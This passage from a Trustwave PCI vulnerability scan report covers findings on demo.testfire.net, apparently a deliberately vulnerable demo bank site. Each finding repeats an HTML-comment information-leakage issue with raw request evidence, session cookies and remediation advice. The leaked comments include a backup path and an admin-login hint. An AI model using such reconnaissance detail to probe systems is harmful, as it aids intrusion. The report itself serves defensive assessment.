demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net:8080/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://demo.testfire.net:8080/sendFeedback HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 323 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

59 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/disclaimer.htm?url=http://www.netsca


HTML or JavaScript pe.com
comments Port: tcp/80

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 324 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

60 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/sendFeedback


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 325 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST http://demo.testfire.net/sendFeedback HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

61 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/disclaimer.htm?url=http://www.nets


HTML or JavaScript cape.com
comments Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 326 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117:8080/disclaimer.htm?url=http://www.netscape.co
m
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
http://65.61.137.117:8080/disclaimer.htm?url=http://www.netscape.co
m HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 327 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

62 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/disclaimer.htm?url=http://www.micr


HTML or JavaScript osoft.com
comments Port: tcp/8080

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://65.61.137.117:8080/disclaimer.htm?url=http://www.microsoft.co
m
1 Javascript Comment(s) found

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 328 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
authorization
Request: GET
http://65.61.137.117:8080/disclaimer.htm?url=http://www.microsoft.co
m HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

63 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/feedback.jsp


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 329 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://65.61.137.117:8080/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

64 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/login.jsp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 330 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

HTML or JavaScript Port: tcp/8080


comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 331 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: GET http://65.61.137.117:8080/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

65 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/login.jsp


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 332 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: GET https://65.61.137.117:8443/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 333 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

66 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117/search.jsp?query=_WSETESTDATA


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET http://65.61.137.117/search.jsp?query=_WSETESTDATA

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 334 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
HTTP/1.1
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

67 Information leakage via 5.0 Medium Fail URL: http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 335 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://65.61.137.117:8080/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

68 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/login.jsp


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 336 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 337 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET https://demo.testfire.net:8443/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

69 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/index.jsp?content=inside_contac


HTML or JavaScript t.htm
comments Port: tcp/8080

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 338 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

70 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/


HTML or JavaScript Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 339 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 340 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

71 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://65.61.137.117:8443/index.jsp?content=personal.htm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 341 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
GET - https://65.61.137.117:8443/index.jsp?content=business.htm
GET - https://65.61.137.117:8443/subscribe.jsp
POST - https://65.61.137.117:8443/doSubscribe
GET - https://65.61.137.117:8443/default.jsp?content=security.htm
GET - https://65.61.137.117:8443/survey_questions.jsp
GET - https://65.61.137.117:8443/survey_questions.jsp?step=a
GET - https://65.61.137.117:8443/status_check.jsp
GET - https://65.61.137.117:8443/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

72 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/index.jsp?content=inside_contact.


HTML or JavaScript htm
comments Port: tcp/8443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 342 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

73 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/doLogin

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 343 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

HTML or JavaScript Port: tcp/8080


comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - http://demo.testfire.net:8080/doLogin
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found


<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 344 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
